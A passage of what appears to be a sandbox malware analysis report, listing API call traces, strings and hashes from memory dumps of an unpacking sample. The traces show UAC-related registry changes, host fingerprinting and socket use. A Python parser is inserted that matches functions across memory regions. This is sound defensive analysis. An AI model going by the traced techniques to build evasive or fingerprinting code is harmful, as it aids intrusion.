• API ID: Time$File$Local$InformationSystemZonewsprintf
• String ID:
• API String ID: 4026320513-0
• Opcode ID: fbb2cc535003bdd2a03704f06e43c86ec17b275768f9954b8d174276db173d5b
• Instruction ID: 15d6b95d7fd125e3af2a84259e5af47986dd72d790a7e8b23b44dbe49d57ca9d
• Opcode Fuzzy Hash: fbb2cc535003bdd2a03704f06e43c86ec17b275768f9954b8d174276db173d5b
• Instruction Fuzzy Hash: 9A5120B1D0021CAACF18DFD5D8885EEBBB9BF48304F14816AF505B6150E7B85AC9CF98
APIs
• IsBadHugeReadPtr.KERNEL32(?,00000014), ref: 02616303
• LoadLibraryA.KERNEL32(?), ref: 0261632A
• GetProcAddress.KERNEL32(00000000,?), ref: 026163B1
• IsBadHugeReadPtr.KERNEL32(-000000DC,00000014), ref: 02616405
Memory Dump Source
• Source File: 00000000.00000002.2081215356.0000000002610000.00000040.00001000.00020000.00000000.sdmp, Offset: 02610000, based on PE: false
Yara matches
Similarity
• API ID: HugeRead$AddressLibraryLoadProc
• String ID:
• API String ID: 3498078134-0
• Opcode ID: 22151fd6ac6a99dd14e45186f4812a7dac7af9c00bb3bb0eb99ee7530713bb62
• Instruction ID: a3435f7e49f3e0b063e0a6b58528d568fccb2ede967e67d119da2454c1dc8c3f
• Opcode Fuzzy Hash: 22151fd6ac6a99dd14e45186f4812a7dac7af9c00bb3bb0eb99ee7530713bb62
• Instruction Fuzzy Hash: 8C413A79A00219EFDB14CF58C884BA9B7B8FF04358F188169E965D7390E771F951CB90
Memory Dump Source
• Source File: 00000000.00000002.2079321759.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2079321759.0000000000414000.00000040.00000001.01000000.00000003.sdmp
Yara matches
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 7d7be85cd36f3663e93a2a6933a3c0dd16534f9087a3b26c869853f350d83737
• Instruction ID: 0bfd2bf0caf83722c61519a9099cbfb16c0865a6a5fe5c2769a2057d5fd36f2a
• Opcode Fuzzy Hash: 7d7be85cd36f3663e93a2a6933a3c0dd16534f9087a3b26c869853f350d83737
• Instruction Fuzzy Hash: 2931A471A00219ABCB109FA6CD85ABEB7F4FF48705F10846BF504F62C1E7B8D6418B68
                                                                                        APIs
                                                                                          • Part of subcall function 0040DD05: GetTickCount.KERNEL32 ref: 0040DD0F
                                                                                          • Part of subcall function 0040DD05: InterlockedExchange.KERNEL32(004136B4,00000001), ref: 0040DD44
                                                                                          • Part of subcall function 0040DD05: GetCurrentThreadId.KERNEL32 ref: 0040DD53
                                                                                        • lstrcmpA.KERNEL32(75920F18,00000000,?,75920F10,00000000,?,00405EC1), ref: 0040E693
                                                                                        • lstrcpynA.KERNEL32(00000008,00000000,0000000F,?,75920F10,00000000,?,00405EC1), ref: 0040E6E9
                                                                                        • lstrcmpA.KERNEL32(?,00000008,?,75920F10,00000000,?,00405EC1), ref: 0040E722
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2079321759.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                         • Associated: 00000000.00000002.2079321759.0000000000414000.00000040.00000001.01000000.00000003.sdmp
                                                                                        Similarity
                                                                                        • API ID: lstrcmp$CountCurrentExchangeInterlockedThreadTicklstrcpyn
                                                                                        • String ID: A$ A
                                                                                        • API String ID: 3343386518-686259309
                                                                                        APIs
                                                                                        • GetTickCount.KERNEL32 ref: 0040272E
                                                                                        • htons.WS2_32(00000001), ref: 00402752
                                                                                        • htons.WS2_32(0000000F), ref: 004027D5
                                                                                        • htons.WS2_32(00000001), ref: 004027E3
                                                                                        • sendto.WS2_32(?,00412BF8,00000009,00000000,00000010,00000010), ref: 00402802
                                                                                          • Part of subcall function 0040EBCC: GetProcessHeap.KERNEL32(00000000,00000000,80000001,0040EBFE,7FFF0001,?,0040DB55,7FFF0001), ref: 0040EBD3
                                                                                          • Part of subcall function 0040EBCC: RtlAllocateHeap.NTDLL(00000000,?,0040DB55,7FFF0001), ref: 0040EBDA
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2079321759.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                         • Associated: 00000000.00000002.2079321759.0000000000414000.00000040.00000001.01000000.00000003.sdmp
                                                                                        Similarity
                                                                                        • API ID: htons$Heap$AllocateCountProcessTicksendto
                                                                                        • API String ID: 1128258776-0
                                                                                        APIs
                                                                                        • setsockopt.WS2_32(00000000,0000FFFF,00000004,00000000,00000004), ref: 0040F2A0
                                                                                        • setsockopt.WS2_32(00000004,0000FFFF,00001005,00000004,00000004), ref: 0040F2C0
                                                                                        • setsockopt.WS2_32(00000004,0000FFFF,00001006,00000004,00000004), ref: 0040F2DD
                                                                                        • setsockopt.WS2_32(?,00000006,00000001,?,00000004), ref: 0040F2EC
                                                                                        • setsockopt.WS2_32(?,0000FFFF,00000080,?,00000004), ref: 0040F2FD
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2079321759.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                         • Associated: 00000000.00000002.2079321759.0000000000414000.00000040.00000001.01000000.00000003.sdmp
                                                                                        Similarity
                                                                                        • API ID: setsockopt
                                                                                        • API String ID: 3981526788-0
                                                                                        APIs
                                                                                        • lstrlenA.KERNEL32(?,localcfg,?,00000000,?,?,00402491,?,?,?,0040E844,-00000030,?,?,?,00000001), ref: 00402429
                                                                                        • lstrlenA.KERNEL32(?,?,00402491,?,?,?,0040E844,-00000030,?,?,?,00000001,00401E3D,00000001,localcfg,lid_file_upd), ref: 0040243E
                                                                                        • lstrcmpiA.KERNEL32(?,?), ref: 00402452
                                                                                        • lstrlenA.KERNEL32(?,?,00402491,?,?,?,0040E844,-00000030,?,?,?,00000001,00401E3D,00000001,localcfg,lid_file_upd), ref: 00402467
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2079321759.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                         • Associated: 00000000.00000002.2079321759.0000000000414000.00000040.00000001.01000000.00000003.sdmp
                                                                                        Similarity
                                                                                        • API ID: lstrlen$lstrcmpi
                                                                                        • String ID: localcfg
                                                                                        • API String ID: 1808961391-1857712256
                                                                                        APIs
                                                                                          • Part of subcall function 0261DF6C: GetCurrentThreadId.KERNEL32 ref: 0261DFBA
                                                                                        • GetFileSize.KERNEL32(00000000,00000000,?,00410170,?,00000000,?,0261A6AC), ref: 0261E7BF
                                                                                        • ReadFile.KERNEL32(00000000,004136C4,00000000,?,00000000,?,00410170,?,00000000,?,0261A6AC), ref: 0261E7EA
                                                                                        • CloseHandle.KERNEL32(00000000,?,00410170,?,00000000,?,0261A6AC), ref: 0261E819
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2081215356.0000000002610000.00000040.00001000.00020000.00000000.sdmp, Offset: 02610000, based on PE: false
                                                                                        Similarity
                                                                                        • API ID: File$CloseCurrentHandleReadSizeThread
                                                                                        • String ID: PromptOnSecureDesktop
                                                                                        • API String ID: 1396056608-2980165447
                                                                                        APIs
                                                                                          • Part of subcall function 0040DD05: GetTickCount.KERNEL32 ref: 0040DD0F
                                                                                          • Part of subcall function 0040DD05: InterlockedExchange.KERNEL32(004136B4,00000001), ref: 0040DD44
                                                                                          • Part of subcall function 0040DD05: GetCurrentThreadId.KERNEL32 ref: 0040DD53
                                                                                        • GetFileSize.KERNEL32(00000000,00000000,?,75920F10,?,00000000,?,0040A445), ref: 0040E558
                                                                                        • ReadFile.KERNEL32(00000000,?,00000000,?,00000000,?,75920F10,?,00000000,?,0040A445), ref: 0040E583
                                                                                        • CloseHandle.KERNEL32(00000000,?,75920F10,?,00000000,?,0040A445), ref: 0040E5B2
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2079321759.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                         • Associated: 00000000.00000002.2079321759.0000000000414000.00000040.00000001.01000000.00000003.sdmp
                                                                                        Similarity
                                                                                        • API ID: File$CloseCountCurrentExchangeHandleInterlockedReadSizeThreadTick
                                                                                        • String ID: PromptOnSecureDesktop
                                                                                        • API String ID: 3683885500-2980165447
                                                                                        APIs
                                                                                        • LoadLibraryA.KERNEL32(Iphlpapi.dll,00000000,localcfg,?,hi_id,?,?,?,?,00000001), ref: 00401AD4
                                                                                        • GetProcAddress.KERNEL32(00000000,GetAdaptersAddresses), ref: 00401AE9
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2079321759.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                         • Associated: 00000000.00000002.2079321759.0000000000414000.00000040.00000001.01000000.00000003.sdmp
                                                                                        Similarity
                                                                                        • API ID: AddressLibraryLoadProc
                                                                                        • String ID: GetAdaptersAddresses$Iphlpapi.dll
                                                                                        • API String ID: 2574300362-1087626847
                                                                                        APIs
                                                                                        • RegOpenKeyExA.ADVAPI32(80000002,00000000,00020119,?), ref: 026176D9
                                                                                        • RegEnumKeyA.ADVAPI32(?,00000000,?,00000104), ref: 0261796D
                                                                                        • RegCloseKey.ADVAPI32(?), ref: 0261797E
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2081215356.0000000002610000.00000040.00001000.00020000.00000000.sdmp, Offset: 02610000, based on PE: false
                                                                                        Similarity
                                                                                        • API ID: CloseEnumOpen
                                                                                        • String ID: PromptOnSecureDesktop
                                                                                        • API String ID: 1332880857-2980165447
                                                                                        APIs
                                                                                          • Part of subcall function 00401AC3: LoadLibraryA.KERNEL32(Iphlpapi.dll,00000000,localcfg,?,hi_id,?,?,?,?,00000001), ref: 00401AD4
                                                                                          • Part of subcall function 00401AC3: GetProcAddress.KERNEL32(00000000,GetAdaptersAddresses), ref: 00401AE9
                                                                                        • GetComputerNameA.KERNEL32(?,0000000F), ref: 00401C15
                                                                                        • GetVolumeInformationA.KERNEL32(00000000,00000000,00000004,00000001,00000000,00000000,00000000,00000000,?,?,?,?,00000001), ref: 00401C51
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2079321759.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                         • Associated: 00000000.00000002.2079321759.0000000000414000.00000040.00000001.01000000.00000003.sdmp
                                                                                        Similarity
                                                                                        • API ID: AddressComputerInformationLibraryLoadNameProcVolume
                                                                                        • String ID: hi_id$localcfg
                                                                                        • API String ID: 2777991786-2393279970
                                                                                        APIs
                                                                                        • RegOpenKeyExA.ADVAPI32(80000001,00000000), ref: 0261999D
                                                                                        • RegDeleteValueA.ADVAPI32(?,00000000), ref: 026199BD
                                                                                        • RegCloseKey.ADVAPI32(?), ref: 026199C6
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2081215356.0000000002610000.00000040.00001000.00020000.00000000.sdmp, Offset: 02610000, based on PE: false
                                                                                        Similarity
                                                                                        • API ID: CloseDeleteOpenValue
                                                                                        • String ID: PromptOnSecureDesktop
                                                                                        • API String ID: 849931509-2980165447
                                                                                        APIs
                                                                                        • RegOpenKeyExA.ADVAPI32(80000001,00000000,PromptOnSecureDesktop,00000000,?,?,0040A14A), ref: 00409736
                                                                                        • RegDeleteValueA.ADVAPI32(0040A14A,00000000,?,?,?,?,?,?,?,?,?,0040A14A), ref: 00409756
                                                                                        • RegCloseKey.ADVAPI32(0040A14A,?,?,?,?,?,?,?,?,?,0040A14A), ref: 0040975F
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2079321759.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                         • Associated: 00000000.00000002.2079321759.0000000000414000.00000040.00000001.01000000.00000003.sdmp
                                                                                        Similarity
                                                                                        • API ID: CloseDeleteOpenValue
                                                                                        • String ID: PromptOnSecureDesktop
                                                                                        • API String ID: 849931509-2980165447
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2081215356.0000000002610000.00000040.00001000.00020000.00000000.sdmp, Offset: 02610000, based on PE: false
                                                                                        Similarity
                                                                                        • API ID: gethostbynameinet_addr
                                                                                        • String ID: time_cfg$u6A
                                                                                        • API String ID: 1594361348-1940331995
                                                                                        APIs
                                                                                        • SetFileAttributesA.KERNEL32(?,00000080), ref: 026169E5
                                                                                        • SetFileAttributesA.KERNEL32(?,00000002), ref: 02616A26
                                                                                        • GetFileSize.KERNEL32(000000FF,00000000), ref: 02616A3A
                                                                                        • CloseHandle.KERNEL32(000000FF), ref: 02616BD8
                                                                                          • Part of subcall function 0261EE95: GetProcessHeap.KERNEL32(00000000,?,00000000,02611DCF,?), ref: 0261EEA8
                                                                                          • Part of subcall function 0261EE95: HeapFree.KERNEL32(00000000), ref: 0261EEAF
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2081215356.0000000002610000.00000040.00001000.00020000.00000000.sdmp, Offset: 02610000, based on PE: false
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: File$AttributesHeap$CloseFreeHandleProcessSize
                                                                                        • String ID:
                                                                                        • API String ID: 3384756699-0
                                                                                        • Opcode ID: 7cb1483d7ca4a0334585b6ef60a3fe03637638a32adcd708d2059a772ed48796
                                                                                        • Instruction ID: 357780723b22bccbcad5ae1c38e4803498ef83cebc5d47abffc2aa03fc5ab711
                                                                                        • Opcode Fuzzy Hash: 7cb1483d7ca4a0334585b6ef60a3fe03637638a32adcd708d2059a772ed48796
                                                                                        • Instruction Fuzzy Hash: 2D71187590021DEFDF10DFA4CC80AEEBBB9FB04358F14856AE515A6290D730AE92DB60
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2079321759.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                         • Associated: 00000000.00000002.2079321759.0000000000414000.00000040.00000001.01000000.00000003.sdmp
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: wsprintf
                                                                                        • String ID: %u.%u.%u.%u.%s$localcfg
                                                                                        • API String ID: 2111968516-120809033
                                                                                        • Opcode ID: 013209f5f393509082169113c365cfa774f3339610439ce827356f9210efd2df
                                                                                        • Instruction ID: f60862e96afe744063ef1f8e151e0253a3d6131670b42bf9f562b78b9aabf051
                                                                                        • Opcode Fuzzy Hash: 013209f5f393509082169113c365cfa774f3339610439ce827356f9210efd2df
                                                                                        • Instruction Fuzzy Hash: 3C41C1729042999FDB21DF798D44BEE7BE89F49310F240066FD64E3192D639EA04CBA4
                                                                                        APIs
                                                                                        • WriteFile.KERNEL32(00000000,00000000,?,00000000,00000000), ref: 026141AB
                                                                                        • GetLastError.KERNEL32 ref: 026141B5
                                                                                        • WaitForSingleObject.KERNEL32(?,?), ref: 026141C6
                                                                                        • GetOverlappedResult.KERNEL32(00000000,00000000,00000000,00000000), ref: 026141D9
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2081215356.0000000002610000.00000040.00001000.00020000.00000000.sdmp, Offset: 02610000, based on PE: false
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: ErrorFileLastObjectOverlappedResultSingleWaitWrite
                                                                                        • String ID:
                                                                                        • API String ID: 3373104450-0
                                                                                        • Opcode ID: 9f1c12f5bce82851f463a843ee7e6df514edb3150162876966f253c0cf19dcdf
                                                                                        • Instruction ID: 6ee90ddb55d8bf4d15105e189d5e7195892d33c589788df7612848ef858e4411
                                                                                        • Opcode Fuzzy Hash: 9f1c12f5bce82851f463a843ee7e6df514edb3150162876966f253c0cf19dcdf
                                                                                        • Instruction Fuzzy Hash: DF01297651110AABDF02DF95ED85BEE3B6CEB18355F004061F901F2150DB70AA518BB5
                                                                                        APIs
                                                                                        • ReadFile.KERNEL32(00000000,00000000,?,00000000,00000000), ref: 0261421F
                                                                                        • GetLastError.KERNEL32 ref: 02614229
                                                                                        • WaitForSingleObject.KERNEL32(?,?), ref: 0261423A
                                                                                        • GetOverlappedResult.KERNEL32(00000000,00000000,00000000,00000000), ref: 0261424D
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2081215356.0000000002610000.00000040.00001000.00020000.00000000.sdmp, Offset: 02610000, based on PE: false
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: ErrorFileLastObjectOverlappedReadResultSingleWait
                                                                                        • String ID:
                                                                                        • API String ID: 888215731-0
                                                                                        • Opcode ID: 7dacf77ebfc6f27f1d23b030b7b6a0e1e1f459510f641919a7ac9d23c17bf39a
                                                                                        • Instruction ID: c1864e4951c703adcdb6eeb943d700fe9dee77e41982586954dd6e1d7b183bb1
                                                                                        • Opcode Fuzzy Hash: 7dacf77ebfc6f27f1d23b030b7b6a0e1e1f459510f641919a7ac9d23c17bf39a
                                                                                        • Instruction Fuzzy Hash: 3C01A572511109ABDF01DF90ED84BEE7BACEB08355F148461F901E2150DB70AA948BB6
                                                                                        APIs
                                                                                        • WriteFile.KERNEL32(00000000,00000000,0040A3C7,00000000,00000000,000007D0,00000001), ref: 00403F44
                                                                                        • GetLastError.KERNEL32 ref: 00403F4E
                                                                                        • WaitForSingleObject.KERNEL32(00000004,?), ref: 00403F5F
                                                                                        • GetOverlappedResult.KERNEL32(00000000,00000000,00000000,00000000), ref: 00403F72
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2079321759.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                         • Associated: 00000000.00000002.2079321759.0000000000414000.00000040.00000001.01000000.00000003.sdmp
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: ErrorFileLastObjectOverlappedResultSingleWaitWrite
                                                                                        • String ID:
                                                                                        • API String ID: 3373104450-0
                                                                                        • Opcode ID: 9f1c12f5bce82851f463a843ee7e6df514edb3150162876966f253c0cf19dcdf
                                                                                        • Instruction ID: 81d5a9f64dfd66904774ebc82d2e0e48c629fa8216d99cd76bf4a5dbd4e59073
                                                                                        • Opcode Fuzzy Hash: 9f1c12f5bce82851f463a843ee7e6df514edb3150162876966f253c0cf19dcdf
                                                                                        • Instruction Fuzzy Hash: B9010C7291110AABDF01DF90ED44BEF7B7CEB08356F104066FA01E2190D774DA558BB6
                                                                                        APIs
                                                                                        • ReadFile.KERNEL32(00000000,00000000,0040A3C7,00000000,00000000,000007D0,00000001), ref: 00403FB8
                                                                                        • GetLastError.KERNEL32 ref: 00403FC2
                                                                                        • WaitForSingleObject.KERNEL32(00000004,?), ref: 00403FD3
                                                                                        • GetOverlappedResult.KERNEL32(00000000,00000000,00000000,00000000), ref: 00403FE6
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2079321759.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                         • Associated: 00000000.00000002.2079321759.0000000000414000.00000040.00000001.01000000.00000003.sdmp
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: ErrorFileLastObjectOverlappedReadResultSingleWait
                                                                                        • String ID:
                                                                                        • API String ID: 888215731-0
                                                                                        • Opcode ID: 7dacf77ebfc6f27f1d23b030b7b6a0e1e1f459510f641919a7ac9d23c17bf39a
                                                                                        • Instruction ID: 44fd539f7a3468c5635e20a1652967c761b46accf60e77792ab8a53432005efc
                                                                                        • Opcode Fuzzy Hash: 7dacf77ebfc6f27f1d23b030b7b6a0e1e1f459510f641919a7ac9d23c17bf39a
                                                                                        • Instruction Fuzzy Hash: A601177291110AAFDF01DF90ED45BEF3B7CEF08356F004062F906E2090D7749A549BA6
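The overlapped WriteFile and ReadFile wrappers above carry the same Opcode IDs (9f1c12f5… and 7dacf77e…) twice: once lifted from the mapped image at 0x400000 ("based on PE: true") and once from the region at 0x2610000 ("based on PE: false"). That pairing is the concrete evidence behind the report's "Detected unpacking" findings: the same function bodies exist in the original module and in a manually mapped copy. The following parser is an added example and not part of the Joe Sandbox report or its tooling; it reads function blocks in the layout shown above, indexes them by Opcode ID and by API String ID, and reports values seen in both a PE-backed and a non-PE region. The excerpt it runs on is constructed from the blocks on this page, and the names `FunctionBlock`, `parse_blocks` and `cross_region_matches` are the author's own.

```python
"""Cross-region function matching over Joe Sandbox "APIs ... Opcode ID" function blocks (added example)."""
import re
from collections import defaultdict
from dataclasses import dataclass, field

# One call line: optional "Part of subcall function XXXX:" prefix, then Api.MODULE(args), ref: addr
CALL_RE = re.compile(
    r"^•\s*(?:Part of subcall function (?P<parent>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>\w+)\.(?P<mod>\w+)(?:\((?P<args>[^)]*)\))?\s*,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)"
)
FIELD_RE = re.compile(r"^•\s*(?P<key>[^:]+?):\s*(?P<val>.*)$")
SOURCE_RE = re.compile(r"Offset:\s*(?P<off>[0-9A-Fa-f]+),\s*based on PE:\s*(?P<pe>true|false)")

# Constructed excerpt: call, Source File, API String ID and Opcode ID lines copied from the report blocks above.
REPORT_EXCERPT = """
APIs
• WriteFile.KERNEL32(00000000,00000000,?,00000000,00000000), ref: 026141AB
• GetLastError.KERNEL32 ref: 026141B5
• WaitForSingleObject.KERNEL32(?,?), ref: 026141C6
• GetOverlappedResult.KERNEL32(00000000,00000000,00000000,00000000), ref: 026141D9
• Source File: 00000000.00000002.2081215356.0000000002610000.00000040.00001000.00020000.00000000.sdmp, Offset: 02610000, based on PE: false
• API String ID: 3373104450-0
• Opcode ID: 9f1c12f5bce82851f463a843ee7e6df514edb3150162876966f253c0cf19dcdf
APIs
• WriteFile.KERNEL32(00000000,00000000,0040A3C7,00000000,00000000,000007D0,00000001), ref: 00403F44
• GetLastError.KERNEL32 ref: 00403F4E
• WaitForSingleObject.KERNEL32(00000004,?), ref: 00403F5F
• GetOverlappedResult.KERNEL32(00000000,00000000,00000000,00000000), ref: 00403F72
• Source File: 00000000.00000002.2079321759.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• API String ID: 3373104450-0
• Opcode ID: 9f1c12f5bce82851f463a843ee7e6df514edb3150162876966f253c0cf19dcdf
APIs
• WriteFile.KERNEL32(00000001,026144E2,00000000,00000000,00000000), ref: 0261E470
• CloseHandle.KERNEL32(00000001,00000003), ref: 0261E484
  • Part of subcall function 0261E2FC: RegCreateKeyExA.ADVAPI32(80000001,0261E50A,00000000,00000000,00000000,00020106,00000000,0261E50A,00000000,000000E4), ref: 0261E319
  • Part of subcall function 0261E2FC: RegSetValueExA.ADVAPI32(0261E50A,?,00000000,00000003,80000001,000FF000,?,?,?,?,000000C8,PromptOnSecureDesktop), ref: 0261E38E
• Source File: 00000000.00000002.2081215356.0000000002610000.00000040.00001000.00020000.00000000.sdmp, Offset: 02610000, based on PE: false
• API String ID: 4151426672-2980165447
• Opcode ID: f9347908c3accb151d66d4a2045a2710535659ff764f1ec32379916764927f64
APIs
• WriteFile.KERNEL32(00000001,0040DAE0,00000000,00000000,00000000), ref: 0040E209
• CloseHandle.KERNEL32(00000001,00000003), ref: 0040E21D
• Source File: 00000000.00000002.2079321759.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• API String ID: 4151426672-2980165447
• Opcode ID: b35f9f727470473fe34b0fcdae204b38b052469ea0fd64ba9bdd2db24e4b8a6b
"""


@dataclass
class FunctionBlock:
    region: str = ""                              # "Offset:" of the dump the function was lifted from
    backed_by_pe: bool = False                    # "based on PE: true" means the mapped image itself
    calls: list = field(default_factory=list)     # (api, module, args, ref, parent-subcall-or-None)
    fields: dict = field(default_factory=dict)    # "Opcode ID", "API String ID", ...


def parse_blocks(text):
    """Split the report text into FunctionBlock records; a block starts at each bare 'APIs' line."""
    blocks, cur = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "APIs":
            cur = FunctionBlock()
            blocks.append(cur)
            continue
        if cur is None or not line.startswith("•"):
            continue
        m = CALL_RE.match(line)
        if m:
            cur.calls.append((m["api"], m["mod"], m["args"] or "", m["ref"], m["parent"]))
            continue
        m = FIELD_RE.match(line)
        if not m:
            continue
        key, val = m["key"].strip(), m["val"].strip()
        if key == "Source File":
            s = SOURCE_RE.search(val)
            if s:
                cur.region, cur.backed_by_pe = s["off"], s["pe"] == "true"
        else:
            cur.fields[key] = val
    return blocks


def cross_region_matches(blocks, key="Opcode ID"):
    """Values of `key` seen in both a PE-backed region and a non-PE region -> sorted region offsets.
    'Opcode ID' is an exact body match; 'API String ID' is the looser call-pattern match."""
    seen = defaultdict(set)
    for b in blocks:
        if b.fields.get(key):
            seen[b.fields[key]].add((b.region, b.backed_by_pe))
    return {v: sorted(r for r, _ in places) for v, places in seen.items()
            if any(pe for _, pe in places) and any(not pe for _, pe in places)}


if __name__ == "__main__":
    parsed = parse_blocks(REPORT_EXCERPT)
    for k in ("Opcode ID", "API String ID"):
        for v, regions in cross_region_matches(parsed, k).items():
            print(f"{k} {v[:16]}... present in regions {regions}")
```

On the constructed excerpt the Opcode ID match is the WriteFile wrapper alone, while the API String ID match also pairs the two PromptOnSecureDesktop functions (f9347908… and b35f9f72…), whose bodies differ but whose call sequence and string are identical. Treat the looser key as a lead to confirm in the disassembly, not as proof that the two functions are the same code.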
                                                                                        APIs
                                                                                        • lstrcmp.KERNEL32(?,80000009), ref: 0261E066
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2081215356.0000000002610000.00000040.00001000.00020000.00000000.sdmp, Offset: 02610000, based on PE: false
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: lstrcmp
                                                                                        • String ID: A$ A$ A
                                                                                        • API String ID: 1534048567-1846390581
                                                                                        • Opcode ID: 328de717d7c8de90c20bd47ba6ba1583dee1274120ab1c13f1680d5d51b61bca
                                                                                        • Instruction ID: 9f9cd7b7188349a4ec7f47406cdf91a24f8a037ab8b45575a5ea5e454d969877
                                                                                        • Opcode Fuzzy Hash: 328de717d7c8de90c20bd47ba6ba1583dee1274120ab1c13f1680d5d51b61bca
                                                                                        • Instruction Fuzzy Hash: E6F09632600742DBCB30CF25D884A82B7E9FF05326B48862BE954C3260D375F4E8CB51
                                                                                        APIs
                                                                                        • GetTickCount.KERNEL32 ref: 0040A4D1
                                                                                        • GetTickCount.KERNEL32 ref: 0040A4E4
                                                                                        • Sleep.KERNEL32(00000000,?,0040C2E9,0040C4E0,00000000,localcfg,?,0040C4E0,00413588,00408810), ref: 0040A4F1
                                                                                        • InterlockedExchange.KERNEL32(?,00000001), ref: 0040A4FA
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2079321759.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                         • Associated: 00000000.00000002.2079321759.0000000000414000.00000040.00000001.01000000.00000003.sdmp
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CountTick$ExchangeInterlockedSleep
                                                                                        • String ID:
                                                                                        • API String ID: 2207858713-0
                                                                                        • Opcode ID: 4cd0520482080c365333fb8aab0c55e365768e1349ae612301bcb729eb943e51
                                                                                        • Instruction ID: a5473328a7e7118e9aede6741b06156156ec1e7733dd8d1ec56465b12724d56e
                                                                                        • Opcode Fuzzy Hash: 4cd0520482080c365333fb8aab0c55e365768e1349ae612301bcb729eb943e51
                                                                                        • Instruction Fuzzy Hash: 7DE0863720131567C6005BA5BD84FAA7B98AB4D761F164072FB08E3280D6AAA99145BF
                                                                                        APIs
                                                                                        • GetTickCount.KERNEL32 ref: 00404E9E
                                                                                        • GetTickCount.KERNEL32 ref: 00404EAD
                                                                                        • Sleep.KERNEL32(0000000A,?,00000001), ref: 00404EBA
                                                                                        • InterlockedExchange.KERNEL32(?,00000001), ref: 00404EC3
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2079321759.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                         • Associated: 00000000.00000002.2079321759.0000000000414000.00000040.00000001.01000000.00000003.sdmp
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CountTick$ExchangeInterlockedSleep
                                                                                        • String ID:
                                                                                        • API String ID: 2207858713-0
                                                                                        • Opcode ID: 574f7709b1251d8d4516fda0e718bcbaf1509578ef326d685951742d25275ed5
                                                                                        • Instruction ID: 0be737a4b1ecb403dd0b6a084e6b0260aeafc6613011e157a8d43e60cd200510
                                                                                        • Opcode Fuzzy Hash: 574f7709b1251d8d4516fda0e718bcbaf1509578ef326d685951742d25275ed5
                                                                                        • Instruction Fuzzy Hash: 6AE086B620121457D61027B9FD84F966A89AB9A361F010532F70DE21C0C6AA989345FD
                                                                                        APIs
                                                                                        • GetTickCount.KERNEL32 ref: 00404BDD
                                                                                        • GetTickCount.KERNEL32 ref: 00404BEC
                                                                                        • Sleep.KERNEL32(00000000,?,?,?,00000004,004050F2), ref: 00404BF9
                                                                                        • InterlockedExchange.KERNEL32(-00000008,00000001), ref: 00404C02
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2079321759.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                         • Associated: 00000000.00000002.2079321759.0000000000414000.00000040.00000001.01000000.00000003.sdmp
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CountTick$ExchangeInterlockedSleep
                                                                                        • String ID:
                                                                                        • API String ID: 2207858713-0
                                                                                        • Opcode ID: 1ad869c4a91a2c80201434bef060b196597965ff38d45849583c02ff4b747b44
